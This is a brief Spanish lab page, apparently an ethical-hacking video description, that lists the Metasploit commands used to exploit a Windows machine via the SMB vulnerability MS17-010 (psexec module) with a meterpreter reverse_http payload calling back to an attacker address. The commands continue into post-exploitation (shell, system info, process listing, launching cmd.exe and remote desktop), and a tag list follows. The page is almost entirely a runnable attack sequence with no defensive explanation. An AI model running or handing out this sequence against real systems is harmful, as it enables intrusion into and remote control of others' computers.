
LABORATORIO

COMANDOS EJECUTADOS
Código: Seleccionar todo
msfconsole
search eternal
use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/reverse_http
set LHOST 192.168.1.183
set RHOSTS 192.168.1.79
show options
exploit
shell
sysinfo
ps
getuid
Screensahre
execute -f cmd.exe
execute -f mstsc.exe
ethical hacking,ethical hacker,cyber seguridad,cyber security,penetration testing cyber security,cursos,capacitacion,Vulnerability,Windows,unix,sistemas operativos,certification,certificacion,como proteger tu computadora,cyber weapons lab,Así de fácil pueden hackearte,auditar,phyton,synology,Networking,redes,lan,wan,hacking etico,information system security,penetration tester,penetration testing,courses,como evitar hackeos,xpenology,command line,putty,ssh,network